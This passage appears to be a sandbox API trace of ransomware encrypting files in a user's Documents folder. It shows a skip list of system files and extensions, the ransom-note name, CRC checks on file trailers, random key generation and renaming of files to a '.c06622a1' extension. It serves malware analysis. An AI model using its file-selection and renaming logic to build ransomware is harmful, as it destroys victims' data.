ftLastWriteTime.dwLowDateTime=0x74283970, ftLastWriteTime.dwHighDateTime=0x1d5e5a7, nFileSizeHigh=0x0, nFileSizeLow=0x14cd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8FWZ88.odp", cAlternateFileName="")) returned 1 [0157.429] _wcsicmp (_Str1="8FWZ88.odp", _Str2="README.c06622a1.TXT") returned -58 [0157.429] wcsstr (_Str="8FWZ88.odp", _SubStr="README") returned 0x0 [0157.429] _wcsicmp (_Str1="autorun.inf", _Str2="8FWZ88.odp") returned 41 [0157.429] wcslen (_String="autorun.inf") returned 0xb [0157.429] _wcsicmp (_Str1="boot.ini", _Str2="8FWZ88.odp") returned 42 [0157.429] wcslen (_String="boot.ini") returned 0x8 [0157.429] _wcsicmp (_Str1="bootfont.bin", _Str2="8FWZ88.odp") returned 42 [0157.429] wcslen (_String="bootfont.bin") returned 0xc [0157.429] _wcsicmp (_Str1="bootsect.bak", _Str2="8FWZ88.odp") returned 42 [0157.429] wcslen (_String="bootsect.bak") returned 0xc [0157.429] _wcsicmp (_Str1="desktop.ini", _Str2="8FWZ88.odp") returned 44 [0157.429] wcslen (_String="desktop.ini") returned 0xb [0157.429] _wcsicmp (_Str1="iconcache.db", _Str2="8FWZ88.odp") returned 49 [0157.429] wcslen (_String="iconcache.db") returned 0xc [0157.429] _wcsicmp (_Str1="ntldr", _Str2="8FWZ88.odp") returned 54 [0157.429] wcslen (_String="ntldr") returned 0x5 [0157.429] _wcsicmp (_Str1="ntuser.dat", _Str2="8FWZ88.odp") returned 54 [0157.429] wcslen (_String="ntuser.dat") returned 0xa [0157.429] _wcsicmp (_Str1="ntuser.dat.log", _Str2="8FWZ88.odp") returned 54 [0157.429] wcslen (_String="ntuser.dat.log") returned 0xe [0157.429] _wcsicmp (_Str1="ntuser.ini", _Str2="8FWZ88.odp") returned 54 [0157.429] wcslen (_String="ntuser.ini") returned 0xa [0157.429] _wcsicmp (_Str1="thumbs.db", _Str2="8FWZ88.odp") returned 60 [0157.429] wcslen (_String="thumbs.db") returned 0x9 [0157.429] _wcsicmp (_Str1="386", _Str2="odp") returned -60 [0157.429] wcslen (_String="386") returned 0x3 [0157.429] _wcsicmp (_Str1="adv", _Str2="odp") returned -14 [0157.429] wcslen (_String="adv") returned 0x3 [0157.429] _wcsicmp (_Str1="ani", _Str2="odp") returned -14 [0157.429] wcslen (_String="ani") returned 0x3 [0157.429] _wcsicmp (_Str1="bat", _Str2="odp") returned -13 [0157.429] wcslen (_String="bat") returned 0x3 [0157.429] _wcsicmp (_Str1="bin", _Str2="odp") returned -13 [0157.429] wcslen (_String="bin") returned 0x3 [0157.430] _wcsicmp (_Str1="cab", _Str2="odp") returned -12 [0157.430] wcslen (_String="cab") returned 0x3 [0157.430] _wcsicmp (_Str1="cmd", _Str2="odp") returned -12 [0157.430] wcslen (_String="cmd") returned 0x3 [0157.430] _wcsicmp (_Str1="com", _Str2="odp") returned -12 [0157.430] wcslen (_String="com") returned 0x3 [0157.430] _wcsicmp (_Str1="cpl", _Str2="odp") returned -12 [0157.430] wcslen (_String="cpl") returned 0x3 [0157.430] _wcsicmp (_Str1="cur", _Str2="odp") returned -12 [0157.430] wcslen (_String="cur") returned 0x3 [0157.430] _wcsicmp (_Str1="deskthemepack", _Str2="odp") returned -11 [0157.430] wcslen (_String="deskthemepack") returned 0xd [0157.430] _wcsicmp (_Str1="diagcab", _Str2="odp") returned -11 [0157.430] wcslen (_String="diagcab") returned 0x7 [0157.430] _wcsicmp (_Str1="diagcfg", _Str2="odp") returned -11 [0157.430] wcslen (_String="diagcfg") returned 0x7 [0157.430] _wcsicmp (_Str1="diagpkg", _Str2="odp") returned -11 [0157.430] wcslen (_String="diagpkg") returned 0x7 [0157.430] _wcsicmp (_Str1="dll", _Str2="odp") returned -11 [0157.430] wcslen (_String="dll") returned 0x3 [0157.430] _wcsicmp (_Str1="drv", _Str2="odp") returned -11 [0157.430] wcslen (_String="drv") returned 0x3 [0157.430] _wcsicmp (_Str1="exe", _Str2="odp") returned -10 [0157.430] wcslen (_String="exe") returned 0x3 [0157.430] _wcsicmp (_Str1="hlp", _Str2="odp") returned -7 [0157.430] wcslen (_String="hlp") returned 0x3 [0157.430] _wcsicmp (_Str1="icl", _Str2="odp") returned -6 [0157.430] wcslen (_String="icl") returned 0x3 [0157.430] _wcsicmp (_Str1="icns", _Str2="odp") returned -6 [0157.430] wcslen (_String="icns") returned 0x4 [0157.430] _wcsicmp (_Str1="ico", _Str2="odp") returned -6 [0157.430] wcslen (_String="ico") returned 0x3 [0157.430] _wcsicmp (_Str1="ics", _Str2="odp") returned -6 [0157.430] wcslen (_String="ics") returned 0x3 [0157.430] _wcsicmp (_Str1="idx", _Str2="odp") returned -6 [0157.430] wcslen (_String="idx") returned 0x3 [0157.431] _wcsicmp (_Str1="ldf", _Str2="odp") returned -3 [0157.431] wcslen (_String="ldf") returned 0x3 [0157.431] _wcsicmp (_Str1="lnk", _Str2="odp") returned -3 [0157.431] wcslen (_String="lnk") returned 0x3 [0157.431] _wcsicmp (_Str1="mod", _Str2="odp") returned -2 [0157.431] wcslen (_String="mod") returned 0x3 [0157.431] _wcsicmp (_Str1="mpa", _Str2="odp") returned -2 [0157.431] wcslen (_String="mpa") returned 0x3 [0157.431] _wcsicmp (_Str1="msc", _Str2="odp") returned -2 [0157.431] wcslen (_String="msc") returned 0x3 [0157.431] _wcsicmp (_Str1="msp", _Str2="odp") returned -2 [0157.431] wcslen (_String="msp") returned 0x3 [0157.431] _wcsicmp (_Str1="msstyles", _Str2="odp") returned -2 [0157.431] wcslen (_String="msstyles") returned 0x8 [0157.431] _wcsicmp (_Str1="msu", _Str2="odp") returned -2 [0157.431] wcslen (_String="msu") returned 0x3 [0157.431] _wcsicmp (_Str1="nls", _Str2="odp") returned -1 [0157.431] wcslen (_String="nls") returned 0x3 [0157.431] _wcsicmp (_Str1="nomedia", _Str2="odp") returned -1 [0157.431] wcslen (_String="nomedia") returned 0x7 [0157.431] _wcsicmp (_Str1="ocx", _Str2="odp") returned -1 [0157.431] wcslen (_String="ocx") returned 0x3 [0157.431] _wcsicmp (_Str1="prf", _Str2="odp") returned 1 [0157.431] wcslen (_String="prf") returned 0x3 [0157.431] _wcsicmp (_Str1="ps1", _Str2="odp") returned 1 [0157.431] wcslen (_String="ps1") returned 0x3 [0157.431] _wcsicmp (_Str1="rom", _Str2="odp") returned 3 [0157.431] wcslen (_String="rom") returned 0x3 [0157.431] _wcsicmp (_Str1="rtp", _Str2="odp") returned 3 [0157.431] wcslen (_String="rtp") returned 0x3 [0157.431] _wcsicmp (_Str1="scr", _Str2="odp") returned 4 [0157.431] wcslen (_String="scr") returned 0x3 [0157.431] _wcsicmp (_Str1="shs", _Str2="odp") returned 4 [0157.431] wcslen (_String="shs") returned 0x3 [0157.431] _wcsicmp (_Str1="spl", _Str2="odp") returned 4 [0157.432] wcslen (_String="spl") returned 0x3 [0157.432] _wcsicmp (_Str1="sys", _Str2="odp") returned 4 [0157.432] wcslen (_String="sys") returned 0x3 [0157.432] _wcsicmp (_Str1="theme", _Str2="odp") returned 5 [0157.432] wcslen (_String="theme") returned 0x5 [0157.432] _wcsicmp (_Str1="themepack", _Str2="odp") returned 5 [0157.432] wcslen (_String="themepack") returned 0x9 [0157.432] _wcsicmp (_Str1="wpx", _Str2="odp") returned 8 [0157.432] wcslen (_String="wpx") returned 0x3 [0157.432] _wcsicmp (_Str1="lock", _Str2="odp") returned -3 [0157.432] wcslen (_String="lock") returned 0x4 [0157.432] _wcsicmp (_Str1="key", _Str2="odp") returned -4 [0157.432] wcslen (_String="key") returned 0x3 [0157.432] _wcsicmp (_Str1="hta", _Str2="odp") returned -7 [0157.432] wcslen (_String="hta") returned 0x3 [0157.432] _wcsicmp (_Str1="msi", _Str2="odp") returned -2 [0157.432] wcslen (_String="msi") returned 0x3 [0157.432] _wcsicmp (_Str1="pdb", _Str2="odp") returned 1 [0157.432] wcslen (_String="pdb") returned 0x3 [0157.432] _wcsicmp (_Str1="sqlite", _Str2="odp") returned 4 [0157.432] wcslen (_String="sqlite") returned 0x6 [0157.432] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.432] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.432] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.432] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.432] wcscpy (in: _Dest=0x32100a0, _Source="8FWZ88.odp" | out: _Dest="8FWZ88.odp") returned="8FWZ88.odp" [0157.432] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8FWZ88.odp", dwFileAttributes=0x80) returned 1 [0157.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8FWZ88.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8fwz88.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0157.433] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.433] ReadFile (in: hFile=0x198, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.434] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x5981175b [0157.434] RtlComputeCrc32 (PartialCrc=0x175b, Buffer=0x32ec24, Length=0x80) returned 0x229834e [0157.434] RtlComputeCrc32 (PartialCrc=0x834e, Buffer=0x32ec24, Length=0x80) returned 0xdfb0b618 [0157.434] RtlComputeCrc32 (PartialCrc=0xb618, Buffer=0x32ec24, Length=0x80) returned 0x6f13b90f [0157.434] RtlComputeCrc32 (PartialCrc=0xb90f, Buffer=0x32ec24, Length=0x80) returned 0x7a821ebe [0157.434] CloseHandle (hObject=0x198) returned 1 [0157.434] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.434] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8FWZ88.odp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8FWZ88.odp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8FWZ88.odp" [0157.434] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8FWZ88.odp") returned 0x36 [0157.434] wcscpy (in: _Dest=0x32200bc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.434] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8FWZ88.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8fwz88.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8FWZ88.odp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8fwz88.odp.c06622a1"), dwFlags=0x8) returned 1 [0157.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8FWZ88.odp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8fwz88.odp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x198 [0157.437] CreateIoCompletionPort (FileHandle=0x198, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0157.437] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0157.445] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x40da2e8 [0157.445] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d07607d [0157.445] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7ef36f85 [0157.445] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x10a55ee7 [0157.445] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2c836353 [0157.445] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x158a4629 [0157.445] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x746a1c72 [0157.445] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x46bdc1d5 [0157.448] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0x96f25513 [0157.448] RtlComputeCrc32 (PartialCrc=0x5513, Buffer=0x3480094, Length=0x80) returned 0xa71ee045 [0157.448] RtlComputeCrc32 (PartialCrc=0xe045, Buffer=0x3480094, Length=0x80) returned 0xa7b4ca00 [0157.448] RtlComputeCrc32 (PartialCrc=0xca00, Buffer=0x3480094, Length=0x80) returned 0x3eeaa18b [0157.448] RtlComputeCrc32 (PartialCrc=0xa18b, Buffer=0x3480094, Length=0x80) returned 0x595c893d [0157.449] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0157.449] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.450] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.451] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9672820, ftCreationTime.dwHighDateTime=0x1d5dcbb, ftLastAccessTime.dwLowDateTime=0xe9792f60, ftLastAccessTime.dwHighDateTime=0x1d5ddda, ftLastWriteTime.dwLowDateTime=0xe9792f60, ftLastWriteTime.dwHighDateTime=0x1d5ddda, nFileSizeHigh=0x0, nFileSizeLow=0xac49, dwReserved0=0x0, dwReserved1=0x0, cFileName="aCWg-pQ.pdf", cAlternateFileName="")) returned 1 [0157.451] _wcsicmp (_Str1="aCWg-pQ.pdf", _Str2="README.c06622a1.TXT") returned -17 [0157.451] wcsstr (_Str="aCWg-pQ.pdf", _SubStr="README") returned 0x0 [0157.451] _wcsicmp (_Str1="autorun.inf", _Str2="aCWg-pQ.pdf") returned 18 [0157.451] wcslen (_String="autorun.inf") returned 0xb [0157.451] _wcsicmp (_Str1="boot.ini", _Str2="aCWg-pQ.pdf") returned 1 [0157.451] wcslen (_String="boot.ini") returned 0x8 [0157.451] _wcsicmp (_Str1="bootfont.bin", _Str2="aCWg-pQ.pdf") returned 1 [0157.451] wcslen (_String="bootfont.bin") returned 0xc [0157.451] _wcsicmp (_Str1="bootsect.bak", _Str2="aCWg-pQ.pdf") returned 1 [0157.451] wcslen (_String="bootsect.bak") returned 0xc [0157.451] _wcsicmp (_Str1="desktop.ini", _Str2="aCWg-pQ.pdf") returned 3 [0157.451] wcslen (_String="desktop.ini") returned 0xb [0157.451] _wcsicmp (_Str1="iconcache.db", _Str2="aCWg-pQ.pdf") returned 8 [0157.451] wcslen (_String="iconcache.db") returned 0xc [0157.451] _wcsicmp (_Str1="ntldr", _Str2="aCWg-pQ.pdf") returned 13 [0157.451] wcslen (_String="ntldr") returned 0x5 [0157.451] _wcsicmp (_Str1="ntuser.dat", _Str2="aCWg-pQ.pdf") returned 13 [0157.451] wcslen (_String="ntuser.dat") returned 0xa [0157.451] _wcsicmp (_Str1="ntuser.dat.log", _Str2="aCWg-pQ.pdf") returned 13 [0157.451] wcslen (_String="ntuser.dat.log") returned 0xe [0157.451] _wcsicmp (_Str1="ntuser.ini", _Str2="aCWg-pQ.pdf") returned 13 [0157.451] wcslen (_String="ntuser.ini") returned 0xa [0157.451] _wcsicmp (_Str1="thumbs.db", _Str2="aCWg-pQ.pdf") returned 19 [0157.451] wcslen (_String="thumbs.db") returned 0x9 [0157.452] _wcsicmp (_Str1="386", _Str2="pdf") returned -61 [0157.452] wcslen (_String="386") returned 0x3 [0157.452] _wcsicmp (_Str1="adv", _Str2="pdf") returned -15 [0157.452] wcslen (_String="adv") returned 0x3 [0157.452] _wcsicmp (_Str1="ani", _Str2="pdf") returned -15 [0157.452] wcslen (_String="ani") returned 0x3 [0157.452] _wcsicmp (_Str1="bat", _Str2="pdf") returned -14 [0157.452] wcslen (_String="bat") returned 0x3 [0157.452] _wcsicmp (_Str1="bin", _Str2="pdf") returned -14 [0157.452] wcslen (_String="bin") returned 0x3 [0157.452] _wcsicmp (_Str1="cab", _Str2="pdf") returned -13 [0157.452] wcslen (_String="cab") returned 0x3 [0157.452] _wcsicmp (_Str1="cmd", _Str2="pdf") returned -13 [0157.452] wcslen (_String="cmd") returned 0x3 [0157.452] _wcsicmp (_Str1="com", _Str2="pdf") returned -13 [0157.452] wcslen (_String="com") returned 0x3 [0157.452] _wcsicmp (_Str1="cpl", _Str2="pdf") returned -13 [0157.452] wcslen (_String="cpl") returned 0x3 [0157.452] _wcsicmp (_Str1="cur", _Str2="pdf") returned -13 [0157.452] wcslen (_String="cur") returned 0x3 [0157.452] _wcsicmp (_Str1="deskthemepack", _Str2="pdf") returned -12 [0157.452] wcslen (_String="deskthemepack") returned 0xd [0157.452] _wcsicmp (_Str1="diagcab", _Str2="pdf") returned -12 [0157.452] wcslen (_String="diagcab") returned 0x7 [0157.452] _wcsicmp (_Str1="diagcfg", _Str2="pdf") returned -12 [0157.452] wcslen (_String="diagcfg") returned 0x7 [0157.452] _wcsicmp (_Str1="diagpkg", _Str2="pdf") returned -12 [0157.452] wcslen (_String="diagpkg") returned 0x7 [0157.452] _wcsicmp (_Str1="dll", _Str2="pdf") returned -12 [0157.452] wcslen (_String="dll") returned 0x3 [0157.452] _wcsicmp (_Str1="drv", _Str2="pdf") returned -12 [0157.453] wcslen (_String="drv") returned 0x3 [0157.453] _wcsicmp (_Str1="exe", _Str2="pdf") returned -11 [0157.453] wcslen (_String="exe") returned 0x3 [0157.453] _wcsicmp (_Str1="hlp", _Str2="pdf") returned -8 [0157.453] wcslen (_String="hlp") returned 0x3 [0157.453] _wcsicmp (_Str1="icl", _Str2="pdf") returned -7 [0157.453] wcslen (_String="icl") returned 0x3 [0157.453] _wcsicmp (_Str1="icns", _Str2="pdf") returned -7 [0157.453] wcslen (_String="icns") returned 0x4 [0157.453] _wcsicmp (_Str1="ico", _Str2="pdf") returned -7 [0157.453] wcslen (_String="ico") returned 0x3 [0157.453] _wcsicmp (_Str1="ics", _Str2="pdf") returned -7 [0157.453] wcslen (_String="ics") returned 0x3 [0157.453] _wcsicmp (_Str1="idx", _Str2="pdf") returned -7 [0157.453] wcslen (_String="idx") returned 0x3 [0157.453] _wcsicmp (_Str1="ldf", _Str2="pdf") returned -4 [0157.453] wcslen (_String="ldf") returned 0x3 [0157.453] _wcsicmp (_Str1="lnk", _Str2="pdf") returned -4 [0157.453] wcslen (_String="lnk") returned 0x3 [0157.453] _wcsicmp (_Str1="mod", _Str2="pdf") returned -3 [0157.453] wcslen (_String="mod") returned 0x3 [0157.453] _wcsicmp (_Str1="mpa", _Str2="pdf") returned -3 [0157.453] wcslen (_String="mpa") returned 0x3 [0157.453] _wcsicmp (_Str1="msc", _Str2="pdf") returned -3 [0157.453] wcslen (_String="msc") returned 0x3 [0157.453] _wcsicmp (_Str1="msp", _Str2="pdf") returned -3 [0157.453] wcslen (_String="msp") returned 0x3 [0157.453] _wcsicmp (_Str1="msstyles", _Str2="pdf") returned -3 [0157.453] wcslen (_String="msstyles") returned 0x8 [0157.453] _wcsicmp (_Str1="msu", _Str2="pdf") returned -3 [0157.453] wcslen (_String="msu") returned 0x3 [0157.453] _wcsicmp (_Str1="nls", _Str2="pdf") returned -2 [0157.454] wcslen (_String="nls") returned 0x3 [0157.454] _wcsicmp (_Str1="nomedia", _Str2="pdf") returned -2 [0157.454] wcslen (_String="nomedia") returned 0x7 [0157.454] _wcsicmp (_Str1="ocx", _Str2="pdf") returned -1 [0157.454] wcslen (_String="ocx") returned 0x3 [0157.454] _wcsicmp (_Str1="prf", _Str2="pdf") returned 14 [0157.454] wcslen (_String="prf") returned 0x3 [0157.454] _wcsicmp (_Str1="ps1", _Str2="pdf") returned 15 [0157.454] wcslen (_String="ps1") returned 0x3 [0157.454] _wcsicmp (_Str1="rom", _Str2="pdf") returned 2 [0157.454] wcslen (_String="rom") returned 0x3 [0157.454] _wcsicmp (_Str1="rtp", _Str2="pdf") returned 2 [0157.454] wcslen (_String="rtp") returned 0x3 [0157.454] _wcsicmp (_Str1="scr", _Str2="pdf") returned 3 [0157.454] wcslen (_String="scr") returned 0x3 [0157.454] _wcsicmp (_Str1="shs", _Str2="pdf") returned 3 [0157.454] wcslen (_String="shs") returned 0x3 [0157.454] _wcsicmp (_Str1="spl", _Str2="pdf") returned 3 [0157.454] wcslen (_String="spl") returned 0x3 [0157.454] _wcsicmp (_Str1="sys", _Str2="pdf") returned 3 [0157.454] wcslen (_String="sys") returned 0x3 [0157.454] _wcsicmp (_Str1="theme", _Str2="pdf") returned 4 [0157.454] wcslen (_String="theme") returned 0x5 [0157.454] _wcsicmp (_Str1="themepack", _Str2="pdf") returned 4 [0157.454] wcslen (_String="themepack") returned 0x9 [0157.454] _wcsicmp (_Str1="wpx", _Str2="pdf") returned 7 [0157.454] wcslen (_String="wpx") returned 0x3 [0157.454] _wcsicmp (_Str1="lock", _Str2="pdf") returned -4 [0157.454] wcslen (_String="lock") returned 0x4 [0157.454] _wcsicmp (_Str1="key", _Str2="pdf") returned -5 [0157.454] wcslen (_String="key") returned 0x3 [0157.454] _wcsicmp (_Str1="hta", _Str2="pdf") returned -8 [0157.454] wcslen (_String="hta") returned 0x3 [0157.455] _wcsicmp (_Str1="msi", _Str2="pdf") returned -3 [0157.455] wcslen (_String="msi") returned 0x3 [0157.455] _wcsicmp (_Str1="pdb", _Str2="pdf") returned -4 [0157.455] wcslen (_String="pdb") returned 0x3 [0157.455] _wcsicmp (_Str1="sqlite", _Str2="pdf") returned 3 [0157.455] wcslen (_String="sqlite") returned 0x6 [0157.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.455] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.455] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.455] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.455] wcscpy (in: _Dest=0x32100a0, _Source="aCWg-pQ.pdf" | out: _Dest="aCWg-pQ.pdf") returned="aCWg-pQ.pdf" [0157.455] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aCWg-pQ.pdf", dwFileAttributes=0x80) returned 1 [0157.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aCWg-pQ.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\acwg-pq.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0157.455] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.455] ReadFile (in: hFile=0x1bc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.456] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x1098ae84 [0157.456] RtlComputeCrc32 (PartialCrc=0xae84, Buffer=0x32ec24, Length=0x80) returned 0x6e0c8e25 [0157.456] RtlComputeCrc32 (PartialCrc=0x8e25, Buffer=0x32ec24, Length=0x80) returned 0xd46a144c [0157.456] RtlComputeCrc32 (PartialCrc=0x144c, Buffer=0x32ec24, Length=0x80) returned 0xa2ce4a62 [0157.456] RtlComputeCrc32 (PartialCrc=0x4a62, Buffer=0x32ec24, Length=0x80) returned 0x5adfa807 [0157.456] CloseHandle (hObject=0x1bc) returned 1 [0157.456] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.457] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aCWg-pQ.pdf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aCWg-pQ.pdf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aCWg-pQ.pdf" [0157.457] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aCWg-pQ.pdf") returned 0x37 [0157.457] wcscpy (in: _Dest=0x32200be, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.457] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aCWg-pQ.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\acwg-pq.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aCWg-pQ.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\acwg-pq.pdf.c06622a1"), dwFlags=0x8) returned 1 [0157.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aCWg-pQ.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\acwg-pq.pdf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1bc [0157.461] CreateIoCompletionPort (FileHandle=0x1bc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0157.461] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0157.468] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x41c10266 [0157.468] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x59a69b7 [0157.468] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x57f2ccac [0157.468] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x425d3630 [0157.468] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x60545192 [0157.468] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50ed9b9f [0157.468] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x15b90299 [0157.468] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4946e28f [0157.473] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x3d2114a9 [0157.473] RtlComputeCrc32 (PartialCrc=0x14a9, Buffer=0x3510094, Length=0x80) returned 0x1dc35e78 [0157.473] RtlComputeCrc32 (PartialCrc=0x5e78, Buffer=0x3510094, Length=0x80) returned 0xf0f45673 [0157.473] RtlComputeCrc32 (PartialCrc=0x5673, Buffer=0x3510094, Length=0x80) returned 0x6b93b817 [0157.473] RtlComputeCrc32 (PartialCrc=0xb817, Buffer=0x3510094, Length=0x80) returned 0xef3f86f5 [0157.473] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0157.473] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.474] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.475] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: 